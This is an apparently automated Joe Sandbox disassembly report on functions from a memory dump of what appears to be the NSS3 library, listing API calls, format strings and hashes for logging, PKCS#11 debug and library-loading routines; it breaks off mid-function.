Opcode ID: 05b232e0c847afda7aa23bb5a8fee4c0fbaef5647f764621eff99f3c5cb3c79e
Instruction ID: 47879329d38b74ce436e60bc822be37aa2afd045e98c7c6167cc307db8dd34dc
Opcode Fuzzy Hash: 05b232e0c847afda7aa23bb5a8fee4c0fbaef5647f764621eff99f3c5cb3c79e
Instruction Fuzzy Hash: AE217B3195A910AFD7015F598C11D6ABBAAFF8672CF098195E8940F2A1FB38DA01C3D2

Uniqueness

Uniqueness Score: -1.00%

Function 6BCC09D0 Relevance: 61.5, APIs: 33, Strings: 2, Instructions: 275filetimethreadCOMMON

Download Yara Rule

APIs

PR_Now.NSS3 ref: 6BCC0A22

Part of subcall function 6BC79DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6BCC0A27), ref: 6BC79DC6
Part of subcall function 6BC79DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6BCC0A27), ref: 6BC79DD1
Part of subcall function 6BC79DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6BC79DED

PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6BCC0A35

Part of subcall function 6BBA3810: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6BBA382A
Part of subcall function 6BBA3810: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6BBA3879

PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6BCC0A66
PR_GetCurrentThread.NSS3 ref: 6BCC0A70
PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6BCC0A9D
PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6BCC0AC8
PR_vsmprintf.NSS3(?,?), ref: 6BCC0AE8
EnterCriticalSection.KERNEL32(?), ref: 6BCC0B19
OutputDebugStringA.KERNEL32(00000000), ref: 6BCC0B48
OutputDebugStringA.KERNEL32(?), ref: 6BCC0B88
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6BCC0C36
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6BCC0C45
memcpy.VCRUNTIME140(?,?,00000000), ref: 6BCC0C5D
_PR_MD_UNLOCK.NSS3(?), ref: 6BCC0C76
PR_LogFlush.NSS3 ref: 6BCC0C7E
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6BCC0C8D
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6BCC0C9C
OutputDebugStringA.KERNEL32(?), ref: 6BCC0CD1
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6BCC0CEC
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6BCC0CFB
OutputDebugStringA.KERNEL32(00000000), ref: 6BCC0D16
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6BCC0D26
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6BCC0D35
OutputDebugStringA.KERNEL32(0000000A), ref: 6BCC0D65
fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6BCC0D70
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6BCC0D7E
_PR_MD_UNLOCK.NSS3(?), ref: 6BCC0D90
free.MOZGLUE(00000000), ref: 6BCC0D99

Strings

%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - , xrefs: 6BCC0A5B
%ld[%p]: , xrefs: 6BCC0A96

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: DebugOutputStringfflush$Timefwrite$Unothrow_t@std@@@__ehfuncinfo$??2@$R_snprintfSystem$CriticalCurrentEnterExplodeFileFlushR_vsmprintfR_vsnprintfSectionThreadfputcfreememcpy
String ID: %04d-%02d-%02d %02d:%02d:%02d.%06d UTC - $%ld[%p]:
API String ID: 3820836880-2800039365
Opcode ID: 338eb638ae7b3726e9dddf09a9d454c7bbbe7e4137669e0760018aec23647dad
Instruction ID: e87d1944fec86f03c520f8749bb97d0ebb1e4247aaed0b48dc7f8b6fd6bc59e3
Opcode Fuzzy Hash: 338eb638ae7b3726e9dddf09a9d454c7bbbe7e4137669e0760018aec23647dad
Instruction Fuzzy Hash: 15A13DB09111549FEF109F74CC49F9BBBB8EF22314F480598F4599B242E77ADA41CB62

Uniqueness

Uniqueness Score: -1.00%

Function 6BBE8BA0 Relevance: 51.0, APIs: 17, Strings: 12, Instructions: 202COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GenerateKeyPair), ref: 6BBE8BC6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6BBE8BF4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6BBE8C03

Part of subcall function 6BCCD930: PL_strncpyz.NSS3(?,?,?), ref: 6BCCD963

PR_LogPrint.NSS3(?,00000000), ref: 6BBE8C19
PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6BBE8C3F
PR_LogPrint.NSS3( pPublicKeyTemplate = 0x%p,?), ref: 6BBE8C5A
PR_LogPrint.NSS3( ulPublicKeyAttributeCount = %d,?), ref: 6BBE8C73
PR_LogPrint.NSS3( pPrivateKeyTemplate = 0x%p,?), ref: 6BBE8C8C
PR_LogPrint.NSS3( ulPrivateKeyAttributeCount = %d,?), ref: 6BBE8CA7
PR_LogPrint.NSS3( phPublicKey = 0x%p,?), ref: 6BBE8CC2
PR_LogPrint.NSS3( phPrivateKey = 0x%p,?), ref: 6BBE8CE7
PL_strncpyz.NSS3(?, *phPublicKey = 0x%x,00000050), ref: 6BBE8D92
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6BBE8DA1
PR_LogPrint.NSS3(?,00000000), ref: 6BBE8DB7
PL_strncpyz.NSS3(?, *phPrivateKey = 0x%x,00000050), ref: 6BBE8DEB
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6BBE8DFA

Part of subcall function 6BBA0F00: PR_GetPageSize.NSS3(6BBA0936,FFFFE8AE,?,6BB316B7,00000000,?,6BBA0936,00000000,?,6BB3204A), ref: 6BBA0F1B
Part of subcall function 6BBA0F00: PR_NewLogModule.NSS3(clock,6BBA0936,FFFFE8AE,?,6BB316B7,00000000,?,6BBA0936,00000000,?,6BB3204A), ref: 6BBA0F25

PR_LogPrint.NSS3(?,00000000), ref: 6BBE8E10

Strings

phPrivateKey = 0x%p, xrefs: 6BBE8CE2
*phPublicKey = 0x%x, xrefs: 6BBE8D7C, 6BBE8D8C
ulPrivateKeyAttributeCount = %d, xrefs: 6BBE8CA2
(CK_INVALID_HANDLE), xrefs: 6BBE8BFC, 6BBE8D9A, 6BBE8DF3
pPublicKeyTemplate = 0x%p, xrefs: 6BBE8C55
ulPublicKeyAttributeCount = %d, xrefs: 6BBE8C6E
hSession = 0x%x, xrefs: 6BBE8BDE, 6BBE8BEE
*phPrivateKey = 0x%x, xrefs: 6BBE8DD5, 6BBE8DE5
phPublicKey = 0x%p, xrefs: 6BBE8CBD
pPrivateKeyTemplate = 0x%p, xrefs: 6BBE8C87
pMechanism = 0x%p, xrefs: 6BBE8C3A
C_GenerateKeyPair, xrefs: 6BBE8BC1

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn$ModulePageSize
String ID: *phPrivateKey = 0x%x$ *phPublicKey = 0x%x$ hSession = 0x%x$ pMechanism = 0x%p$ pPrivateKeyTemplate = 0x%p$ pPublicKeyTemplate = 0x%p$ phPrivateKey = 0x%p$ phPublicKey = 0x%p$ ulPrivateKeyAttributeCount = %d$ ulPublicKeyAttributeCount = %d$ (CK_INVALID_HANDLE)$C_GenerateKeyPair
API String ID: 510426473-985563836
Opcode ID: 9560cb7d4f81e2d009af6bb4f622bb918436d6e47c5e2c44c1e12cdebe1bf4ae
Instruction ID: 3621d6664ce587cf6d08df217ad7f6364529eb047d7336e12327c3556e246c2a
Opcode Fuzzy Hash: 9560cb7d4f81e2d009af6bb4f622bb918436d6e47c5e2c44c1e12cdebe1bf4ae
Instruction Fuzzy Hash: 4A61B375550144EBEB00DF10DD86E5F77A1EB5234DF488068E9086B221EB3DDA56CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 6BBC6BF0 Relevance: 49.1, APIs: 19, Strings: 9, Instructions: 148COMMON

Download Yara Rule

APIs

PR_smprintf.NSS3(6BD00148,?,?,?,?,6BBC6DC2), ref: 6BBC6BFF
PR_smprintf.NSS3(%s manufacturerID='%s',00000000,?,6BBC6DC2), ref: 6BBC6C1C

Part of subcall function 6BB9C5E0: free.MOZGLUE(?,?,?,?,00000000,00000001,?,6BBA1FBD,Unable to create nspr log file '%s',00000000), ref: 6BB9C63B

free.MOZGLUE(00000000,?,?,?,6BBC6DC2), ref: 6BBC6C27
PR_smprintf.NSS3(%s libraryDescription='%s',00000000,?,6BBC6DC2), ref: 6BBC6C45
free.MOZGLUE(00000000,?,?,?,6BBC6DC2), ref: 6BBC6C50
PR_smprintf.NSS3(%s cryptoTokenDescription='%s',00000000,?,6BBC6DC2), ref: 6BBC6C71
free.MOZGLUE(00000000,?,?,?,6BBC6DC2), ref: 6BBC6C7C
PR_smprintf.NSS3(%s dbTokenDescription='%s',00000000,?,6BBC6DC2), ref: 6BBC6C9D
free.MOZGLUE(00000000,?,?,?,6BBC6DC2), ref: 6BBC6CA8
PR_smprintf.NSS3(%s cryptoSlotDescription='%s',00000000,?,6BBC6DC2), ref: 6BBC6CC9
free.MOZGLUE(00000000,?,?,?,6BBC6DC2), ref: 6BBC6CD4
PR_smprintf.NSS3(%s dbSlotDescription='%s',00000000,?,6BBC6DC2), ref: 6BBC6CF5
free.MOZGLUE(00000000,?,?,?,6BBC6DC2), ref: 6BBC6D00
PR_smprintf.NSS3(%s FIPSSlotDescription='%s',00000000,?,6BBC6DC2), ref: 6BBC6D1D
free.MOZGLUE(00000000,?,?,?,6BBC6DC2), ref: 6BBC6D28
PR_smprintf.NSS3(%s FIPSTokenDescription='%s',00000000,?,6BBC6DC2), ref: 6BBC6D45
free.MOZGLUE(00000000,?,?,?,6BBC6DC2), ref: 6BBC6D50
PR_smprintf.NSS3(%s minPS=%d,00000000,?,6BBC6DC2), ref: 6BBC6D68
free.MOZGLUE(00000000,?,?,?,6BBC6DC2), ref: 6BBC6D73

Strings

%s dbSlotDescription='%s', xrefs: 6BBC6CF0
%s FIPSSlotDescription='%s', xrefs: 6BBC6D18
%s cryptoTokenDescription='%s', xrefs: 6BBC6C6C
%s libraryDescription='%s', xrefs: 6BBC6C40
%s FIPSTokenDescription='%s', xrefs: 6BBC6D40
%s minPS=%d, xrefs: 6BBC6D63
%s cryptoSlotDescription='%s', xrefs: 6BBC6CC4
%s dbTokenDescription='%s', xrefs: 6BBC6C98
%s manufacturerID='%s', xrefs: 6BBC6C17

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: R_smprintffree
String ID: %s FIPSSlotDescription='%s'$%s FIPSTokenDescription='%s'$%s cryptoSlotDescription='%s'$%s cryptoTokenDescription='%s'$%s dbSlotDescription='%s'$%s dbTokenDescription='%s'$%s libraryDescription='%s'$%s manufacturerID='%s'$%s minPS=%d
API String ID: 657075589-3414793728
Opcode ID: 9a7d3dbee8881695d94a2a6c17b15bc569b5e9770184ed1b1bbb1efbac787360
Instruction ID: 29a15836894ecc98f0688d4e23b43a5bcf62a74e1846424297faaddaccdf75f2
Opcode Fuzzy Hash: 9a7d3dbee8881695d94a2a6c17b15bc569b5e9770184ed1b1bbb1efbac787360
Instruction Fuzzy Hash: 644195B690159227B710AA696C0AD7B3A5CEDC65D4B090174FC2EC7301FB19CE1592FB

Uniqueness

Uniqueness Score: -1.00%

Function 6BBA0AA0 Relevance: 45.7, APIs: 24, Strings: 2, Instructions: 227libraryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE89D,00000000), ref: 6BBA0AD4

Part of subcall function 6BC5C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6BC5C2BF

PR_EnterMonitor.NSS3 ref: 6BBA0B0D
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 6BBA0B2E
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 6BBA0B54
WideCharToMultiByte.KERNEL32 ref: 6BBA0B94
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6BBA0BC9
calloc.MOZGLUE(00000001,00000014), ref: 6BBA0BEA
LoadLibraryExW.KERNEL32(?,00000000,?), ref: 6BBA0C15

Strings

error %d, xrefs: 6BBA0D08
Loaded library %s (load lib), xrefs: 6BBA0D6F

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: ByteCharMultiWide$EnterErrorLibraryLoadMonitorValuecalloc
String ID: Loaded library %s (load lib)$error %d
API String ID: 2139286163-2368894446
Opcode ID: 8ec49740c8545219d06505b4154c05a12651ceb103f92f0847c84d45e413759a
Instruction ID: 6d401e8ef4d23ec3081696e39d9ae21e452a7192e0ff7b9700d6b1aaff730c35
Opcode Fuzzy Hash: 8ec49740c8545219d06505b4154c05a12651ceb103f92f0847c84d45e413759a
Instruction Fuzzy Hash: 8971F675D082509BEB109F34CD85B6BBBF8EF46714F4440A9EC09DB240EB79EA44CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6BBECB70 Relevance: 42.2, APIs: 14, Strings: 10, Instructions: 225fileCOMMON

Download Yara Rule

APIs

PR_GetEnvSecure.NSS3(NSS_OUTPUT_FILE,6BC0444C,00000000,00000000,00000000,?,6BBC7F7C,6BBC80DD), ref: 6BBECB8B

Part of subcall function 6BBA1240: TlsGetValue.KERNEL32(00000040,?,6BBA116C,NSPR_LOG_MODULES), ref: 6BBA1267
Part of subcall function 6BBA1240: EnterCriticalSection.KERNEL32(?,?,?,6BBA116C,NSPR_LOG_MODULES), ref: 6BBA127C
Part of subcall function 6BBA1240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6BBA116C,NSPR_LOG_MODULES), ref: 6BBA1291
Part of subcall function 6BBA1240: PR_Unlock.NSS3(?,?,?,?,6BBA116C,NSPR_LOG_MODULES), ref: 6BBA12A0

fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,6BCFDEB5,?,6BC0444C,00000000,00000000,00000000,?,6BBC7F7C,6BBC80DD), ref: 6BBECB9D
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,?,6BC0444C,00000000,00000000,00000000,?,6BBC7F7C,6BBC80DD), ref: 6BBECBAE
fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000,?,?,?,?,?,?,?,?,?,6BC0444C,00000000,00000000,00000000), ref: 6BBECBE6
PR_IntervalToMicroseconds.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6BC0444C,00000000,00000000,00000000), ref: 6BBECC37
PR_IntervalToMilliseconds.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6BC0444C,00000000,00000000), ref: 6BBECCA4
fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000), ref: 6BBECD84
fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000,?,?,?,?,?,?,?,?,?,?,?,?,6BC0444C,00000000), ref: 6BBECDA6
PR_IntervalToMilliseconds.NSS3(6BC0444C,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6BC0444C), ref: 6BBECE02
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6BBECE59
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001), ref: 6BBECE64
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6BBECE72

Strings

Function, xrefs: 6BBECBCD
% Time, xrefs: 6BBECBB9
%-25s %10d %10d%2s , xrefs: 6BBECCD3
NSS_OUTPUT_FILE, xrefs: 6BBECB86
Totals, xrefs: 6BBECE2E
%-25s %10s %12s %12s %10s, xrefs: 6BBECBD2
Avg., xrefs: 6BBECBBE
Maximum number of concurrent open sessions: %d, xrefs: 6BBECE4A
# Calls, xrefs: 6BBECBC8
%25s %10d %10d%2s, xrefs: 6BBECE33

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: Intervalfputc$Milliseconds__acrt_iob_func$CriticalEnterMicrosecondsSectionSecureUnlockValuefclosefflushfopengetenv
String ID: Maximum number of concurrent open sessions: %d$# Calls$% Time$%-25s %10d %10d%2s $%-25s %10s %12s %12s %10s$%25s %10d %10d%2s$Avg.$Function$NSS_OUTPUT_FILE$Totals
API String ID: 2795105899-3917921256
Opcode ID: 9420d2d1009c6eb1fe9ca2d8b76006ea99fe65f556b3b07eec522975a52adb95
Instruction ID: 213042df69695c96f80530586c560a63cb13a541b99e98a14f13ef27cda46851
Opcode Fuzzy Hash: 9420d2d1009c6eb1fe9ca2d8b76006ea99fe65f556b3b07eec522975a52adb95
Instruction Fuzzy Hash: EC718C72D142C09BC7019B789C42A2EBA79DF867C4F044265E40A7A321F77D9A5386F2

Uniqueness

Uniqueness Score: -1.00%

Function 6BBF6910 Relevance: 38.6, APIs: 15, Strings: 7, Instructions: 131COMMON

Download Yara Rule

APIs

NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6BBF6943

Part of subcall function 6BC14210: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,883B7A0C,flags,?,00000000,?,6BBF5947,flags,printPolicyFeedback,?,?,?,?,?,?,00000000), ref: 6BC14220
Part of subcall function 6BC14210: NSSUTIL_ArgGetParamValue.NSS3(?,6BBF5947,?,?,?,?,?,?,00000000,?,00000000,?,6BBF7703,?,00000000,00000000), ref: 6BC1422D
Part of subcall function 6BC14210: PL_strncasecmp.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6BBF7703), ref: 6BC1424B
Part of subcall function 6BC14210: free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6BBF7703,?,00000000), ref: 6BC14272

NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6BBF6957
NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6BBF6972
NSSUTIL_ArgStrip.NSS3(00000000), ref: 6BBF6983

Part of subcall function 6BC13EA0: isspace.API-MS-WIN-CRT-STRING-L1-1-0(8914C483,70E85609,6BBEC79F,?,6BBF6247,70E85609,?,?,6BBEC79F,6BBF781D,?,6BBEBD52,00000001,70E85609,D85D8B04,?), ref: 6BC13EB8

PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6BBF69AA
PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6BBF69BE
PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6BBF69D2
NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6BBF69DF

Part of subcall function 6BC14020: isspace.API-MS-WIN-CRT-STRING-L1-1-0(FFFFEF69,00000000,?,?,766B4C80,?,6BC150B7,?), ref: 6BC14041

free.MOZGLUE(00000000), ref: 6BBF69F6
NSSUTIL_ArgFetchValue.NSS3(-0000000A,?), ref: 6BBF6A04
free.MOZGLUE(00000000), ref: 6BBF6A1B
NSSUTIL_ArgFetchValue.NSS3(-0000000B,?), ref: 6BBF6A29
free.MOZGLUE(00000000), ref: 6BBF6A3F
NSSUTIL_ArgFetchValue.NSS3(-0000000A,?), ref: 6BBF6A4D
NSSUTIL_ArgStrip.NSS3(?), ref: 6BBF6A5B

Strings

nocertdb, xrefs: 6BBF6951
certPrefix=, xrefs: 6BBF69B8
configdir=, xrefs: 6BBF69A4
flags, xrefs: 6BBF6937, 6BBF6942, 6BBF6956, 6BBF696D
readOnly, xrefs: 6BBF693D
keyPrefix=, xrefs: 6BBF69CC
nokeydb, xrefs: 6BBF6968

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: L_strncasecmpValuefree$FetchFlag$Stripisspace$ParamParameterSkipstrlen
String ID: certPrefix=$configdir=$flags$keyPrefix=$nocertdb$nokeydb$readOnly
API String ID: 2065226673-2785624044
Opcode ID: 70ac834ba955f76052da4eb222d7e17ac3b20627022f16bfefa8d96621006a63
Instruction ID: ae591b8f97480486374d75d18db86dcace8ee51709ed584f11e5ceb51a54a6d8
Opcode Fuzzy Hash: 70ac834ba955f76052da4eb222d7e17ac3b20627022f16bfefa8d96621006a63
Instruction Fuzzy Hash: E3415EF1E102056BE710DB74AC82B5A77ACEF15248F044474ED0AE6242F63DDA19C6B1

Uniqueness

Uniqueness Score: -1.00%

Function 6BBE4950 Relevance: 36.9, APIs: 13, Strings: 8, Instructions: 170COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_CopyObject), ref: 6BBE4976
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6BBE49A7
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6BBE49B6

Part of subcall function 6BCCD930: PL_strncpyz.NSS3(?,?,?), ref: 6BCCD963

PR_LogPrint.NSS3(?,00000000), ref: 6BBE49CC
PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6BBE49FA
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6BBE4A09
PR_LogPrint.NSS3(?,00000000), ref: 6BBE4A1F
PR_LogPrint.NSS3( pTemplate = 0x%p,?), ref: 6BBE4A40
PR_LogPrint.NSS3( ulCount = %d,?), ref: 6BBE4A5C
PR_LogPrint.NSS3( phNewObject = 0x%p,?), ref: 6BBE4A7C
PL_strncpyz.NSS3(?, *phNewObject = 0x%x,00000050), ref: 6BBE4B17
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6BBE4B26
PR_LogPrint.NSS3(?,00000000), ref: 6BBE4B3C

Strings

*phNewObject = 0x%x, xrefs: 6BBE4B01, 6BBE4B11
(CK_INVALID_HANDLE), xrefs: 6BBE49AF, 6BBE4A02, 6BBE4B1F
phNewObject = 0x%p, xrefs: 6BBE4A77
hObject = 0x%x, xrefs: 6BBE49E4, 6BBE49F4
C_CopyObject, xrefs: 6BBE4971
hSession = 0x%x, xrefs: 6BBE4991, 6BBE49A1
pTemplate = 0x%p, xrefs: 6BBE4A39
ulCount = %d, xrefs: 6BBE4A57

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *phNewObject = 0x%x$ hObject = 0x%x$ hSession = 0x%x$ pTemplate = 0x%p$ phNewObject = 0x%p$ ulCount = %d$ (CK_INVALID_HANDLE)$C_CopyObject
API String ID: 1003633598-1222337137
Opcode ID: 272d6d97adc9c21d79d3ad554d2a74caabdb50f730a7b997fae4c80835ca1281
Instruction ID: 63e09ea120156bddfb839e2eb18344220baa5d604a981f1e5d485ff455e9937b
Opcode Fuzzy Hash: 272d6d97adc9c21d79d3ad554d2a74caabdb50f730a7b997fae4c80835ca1281
Instruction Fuzzy Hash: 3551E174650144AFEB00DF25CC86F5F77A5EB4235DF884028F9086B221EB29DA16CBB6

Uniqueness

Uniqueness Score: -1.00%

Function 6BBE89B0 Relevance: 33.4, APIs: 11, Strings: 8, Instructions: 149COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GenerateKey), ref: 6BBE89D6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6BBE8A04
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6BBE8A13

Part of subcall function 6BCCD930: PL_strncpyz.NSS3(?,?,?), ref: 6BCCD963

PR_LogPrint.NSS3(?,00000000), ref: 6BBE8A29
